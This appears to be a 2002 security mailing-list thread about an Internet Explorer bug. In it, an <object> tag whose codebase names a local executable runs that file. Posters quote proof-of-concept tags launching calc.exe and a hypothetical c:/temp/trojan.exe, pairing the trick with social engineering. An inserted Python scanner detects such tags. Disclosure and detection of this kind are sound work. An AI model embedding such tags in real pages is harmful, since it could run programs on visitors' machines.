http://server/quickstart/aspplus/samples/webforms/ctrlref/htmlctrl/HtmlInput File/VB/HtmlInputFile1.aspx
+
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/temp/trojan.exe"></object>

Probably with this example [careless combination] and social engineering, a silly IIS box manager it affects ... in another way it is not checked since I have not had time for the moment.

Best regards
CT
www.heinekenteam.com

I wanted to install Opera in my Windows box, but... Luciano Pavarotti ate up.

----- Original Message -----
From: "Steve" <steveat_private>
To: <vuln-devat_private>; <bugtraqat_private>
Sent: Wednesday, March 06, 2002 8:54 PM
Subject: IExplorer

> I know we have seen many websites already showing this as a problem.
>
>
> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="c:/winnt/system32/calc.exe"></object>
> <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111"
> codebase="c:/windows/system32/calc.exe"></object>
>
> Of course, this is part of the HTML that is causing this problem, but I was
> unable to reformat the string to cause any substantial privilege escalation
> in the system via this bug.
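
Added example, not part of either message in this thread: a small scanner that a content filter or mail gateway could run over HTML to flag `<object>` elements whose `codebase` attribute points at a local file, the pattern quoted above. The sample document, the `file:` and UNC forms, and the names `ObjectCodebaseScanner` and `scan_html` are assumptions of this example.

```python
import re
from html.parser import HTMLParser

# Local-path forms treated as suspicious in a codebase attribute:
# drive letter (c:/ or c:\), file: URL, UNC path (\\host\share).
LOCAL_CODEBASE = re.compile(r'^\s*(?:[a-z]:[\\/]|file:|\\\\)', re.IGNORECASE)


class ObjectCodebaseScanner(HTMLParser):
    """Collects <object> tags whose codebase attribute is a local path."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag != "object":
            return
        attr = {name: (value or "") for name, value in attrs}
        codebase = attr.get("codebase", "")
        if LOCAL_CODEBASE.match(codebase):
            line, _col = self.getpos()
            self.findings.append({
                "line": line,
                "classid": attr.get("classid", ""),
                "codebase": codebase.strip(),
            })


def scan_html(html):
    """Return one finding per <object> tag with a local-path codebase."""
    scanner = ObjectCodebaseScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: line 2 is the tag quoted in the thread, line 3 is a
# constructed upper-case file: variant, line 4 is a benign remote codebase.
SAMPLE = """<html><body>
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
<OBJECT CLASSID="clsid:11111111-1111-1111-1111-111111111111" CODEBASE="file:///c:/temp/x.exe"></OBJECT>
<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="https://example.com/player.cab"></object>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```
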
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 21:40:20 PST